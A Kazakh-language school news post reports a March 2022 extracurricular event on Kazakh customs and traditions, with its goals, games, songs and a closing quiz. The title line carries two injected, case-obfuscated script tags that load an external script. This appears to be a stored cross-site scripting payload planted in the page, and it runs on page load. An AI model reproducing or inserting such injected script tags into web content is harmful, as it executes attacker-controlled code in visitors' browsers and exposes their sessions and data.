Қазақ халқының әдет- ғұрыптары мен салт дәстүрлері.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.03.2022

15 наурыз күні мектебімізде "Қазақ халқының әдет-ғұрыптары мен салт-дәстүрлері" атты сыныптан тыс іс-шара өтті.
Іс-шараның мақсаты:  
Оқушылардың адамгершілік патриоттық сезімдерін қалыптастыру. Қазақ халқының әдет-ғұрыптары, салт-дәстүрлері, фольклоры туралы білімдерін кеңейту, пысықтау. Ұлттық мәдениетті құрметтеуді тәрбиелеу. Оқушылар арасындағы байқаулар өте қызық өтті. Мұғалімдер оқушыларға  қазақ халқының әртүрлі салт-дәстүрлерін көрсетті, балалар ұлттық ойындар ойнады, өлеңдер оқыды. Мерекелік іс-шараның соңында қазақ халқының әдет-ғұрыптары мен салт-дәстүрлері бойынша сұрақ-жауап ойыны өткізілді. Бүкіл іс-шараның барысында мұғалімдер мен оқушылардың арасында мерекелік атмосфера сезілді. Іс-шараны 6-9 сыныптың сынып жетекшілері өткізді.

Просмотров: 283


Пікір қосу



Деректерді қолтаңбаға қосу